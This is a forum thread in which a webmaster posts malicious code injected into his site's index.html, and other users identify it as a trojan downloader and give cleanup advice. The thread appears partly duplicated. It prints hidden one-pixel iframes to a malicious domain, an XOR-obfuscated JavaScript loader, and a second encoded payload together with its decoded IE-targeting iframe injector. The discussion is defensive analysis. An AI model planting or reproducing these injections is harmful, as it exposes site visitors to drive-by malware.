Someone hacked my TGP and put this code on my index.html - GoFuckYourself.com

ER!C L!VE · 12-11-2006, 02:34 PM

Does anyone know what this code does? It could be a stats counter for all I know.. Any helpful input is appreciated.

<body bgcolor="#ffffff">
<iframe src='http://wsfgfdgrtyhgfd.net/adv/171/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=171' width=1 height=1></iframe><script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD% C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD %C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8 B%8B%C3%D4%C1%D6%C5%C4%C7%88%C7%CB%C9%8B%C6%C8%D0% 97%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2 %D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%C D%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tm p = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
</body>
</html>

Thanks in advance!

Eric

JD · 12-11-2006, 02:42 PM

i've made numerous posts about this. Remove the iframe and javascript then change all the system passwords as well as your trade script/thumb script pwds and you should be fine.

it's a bot of some sort that's doing it. I've been hit many many times and changing all the pwds was the only way it managed to stop

jacked · 12-11-2006, 02:43 PM

you got scumware on that box

HTML/TrojanDownloader.Agent.AU

do a search for

http://wsfgfdgrtyhgfd.net

Quote:

decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

and more about it here

http://www.aboutus.org/Wsfgfdgrtyhgfd.net

ER!C L!VE · 12-11-2006, 02:44 PM

Fuck. Thanks bro.

Violetta · 12-11-2006, 03:12 PM

yeah... I've had trouble with that shit too! It is some kind of a trojan. Anyway, what I did, was upgraded wordpress and changed the password to my ftp! Never happend again after that!

12-11-2006, 02:34 PM	#1
ER!C L!VE Confirmed User Join Date: Feb 2005 Location: WORLDW!DE Posts: 724	Someone hacked my TGP and put this code on my index.html Does anyone know what this code does? It could be a stats counter for all I know.. Any helpful input is appreciated. <body bgcolor="#ffffff"> <iframe src='http://wsfgfdgrtyhgfd.net/adv/171/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=171' width=1 height=1></iframe><script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD% C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD %C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8 B%8B%C3%D4%C1%D6%C5%C4%C7%88%C7%CB%C9%8B%C6%C8%D0% 97%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2 %D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%C D%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tm p = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> </body> </html> Thanks in advance! Eric __________________ www.BackroomCastingCouch.com www.ExploitedCollegeGirls.com www.FCUKCash.com

12-11-2006, 02:44 PM	#4
ER!C L!VE Confirmed User Join Date: Feb 2005 Location: WORLDW!DE Posts: 724	Fuck. Thanks bro. __________________ www.BackroomCastingCouch.com www.ExploitedCollegeGirls.com www.FCUKCash.com

12-11-2006, 03:12 PM	#5
Violetta Affiliate Join Date: Jul 2004 Posts: 28,735	yeah... I've had trouble with that shit too! It is some kind of a trojan. Anyway, what I did, was upgraded wordpress and changed the password to my ftp! Never happend again after that! __________________ M&A Queen

12-11-2006, 02:42 PM	#2
JD Too lazy to set a custom title Industry Role: Join Date: Sep 2003 Posts: 22,651	i've made numerous posts about this. Remove the iframe and javascript then change all the system passwords as well as your trade script/thumb script pwds and you should be fine. it's a bot of some sort that's doing it. I've been hit many many times and changing all the pwds was the only way it managed to stop